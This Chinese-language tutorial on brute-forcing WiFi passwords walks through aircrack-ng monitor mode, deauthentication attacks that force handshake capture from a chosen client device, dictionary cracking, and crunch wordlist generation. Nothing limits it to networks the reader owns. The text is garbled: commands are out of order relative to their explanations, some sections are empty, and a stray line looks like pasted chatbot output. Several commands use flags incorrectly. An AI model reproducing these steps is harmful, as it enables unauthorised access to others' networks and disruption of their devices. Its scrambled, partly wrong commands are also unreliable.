sudo airmon-ng start wlan0
一、前期准备
1.安装 Kali Linux
如果还没有安装 Kali Linux,可以按照 Kali Linux官方安装教程安装: Kail Linux官方安装教程: kali.org/docs/installation/ 安装。
2.配置无线网卡
将无线网卡连接到计算机,并将其设置为监听模式。
在监听模式下,网卡可以接收和发送所有无线数据包,包括包含密码的握手包。
sudo airodump-ng wlan0mon
sudo aireplay-ng -0 2 -a BSSID -c MAC -w FILENAME wlan0mon
此命令将将 wlan0 网卡置于监听模式,并将其重命名为 wlan0mon(避免与其他网络设备发生冲突).
二、爆破密码
1.扫描周围的 WiFi 网络
此命令将列出周围所有可用的 WiFi 网络,并显示它们的名称、信道、加密类型等信息。
2.抓取包含密码的握手包
sudo aircrack-ng -w WORDLIST FILENAME
此命令将发送 deauthentication 帧,以迫使连接到 BSSID 为 BSSID、MAC 地址为 MAC 的设备重新进行身份验证。当设备重新进行身份验证时,将会生成包含密码的握手包,并保存到 FILENAME 文件中。
使用 aireplay-ng -0 2 -a BSSID -c MAC -w FILENAME wlan0mon 命令抓取包含密码的握手包时,需要指定以下参数:
1.-0 2:发送 deauthentication 帧,以迫使连接到目标 WiFi 网络的设备重新进行身份验证。
2.-a BSSID:目标 WiFi 网络的 BSSID。
3.-c MAC:目标设备的 MAC 地址。
3.破解密码
crunch
此命令将使用 WORDLIST 字典破解 FILENAME 文件中的握手包。
使用 aircrack-ng -w WORDLIST FILENAME 命令破解密码时,需要指定以下参数:
1.-w WORDLIST:字典文件名。
2.FILENAME:包含握手包的文件名。
好的,以下是继续爆破 WiFi 密码的教程:
4.字典文件
字典文件是用于破解密码的文件。字典文件中包含了大量常见的密码,例如 123456、password、admin 等。
手动创建字典:
使用 crunch 工具创建字典文件非常简单,只需使用以下命令即可:
crunch 8 8 -t abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 -o password.txt
crunch 8 8 -t abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 -o password.txt
例如,要创建一个包含所有长度为 8 的字母数字密码的字典文件,可以使用以下命令:
此命令将创建一个名为 password.txt 的字典文件,其中包含所有长度为 8 的字母数字密码。
参数说明
crunch 工具的参数如下:
常用参数
crunch 工具支持多种参数,以下是一些常用的参数:
示例
以下是一些使用 crunch 工具创建字典文件的示例:
crunch 8 8 -t abcdefghijklmnopqrstuvwxyz -o password.txt
crunch 8 8 -t 0123456789 -o password.txt
crunch 8 8 -t abcdefghijklmnopqrstuvwxyz0123456789 -o password.txt
crunch 8 8 -t abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 -o password.txt
crunch 8 8 -t abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()_+-={}[]|:;"',./?`~ -o password.txt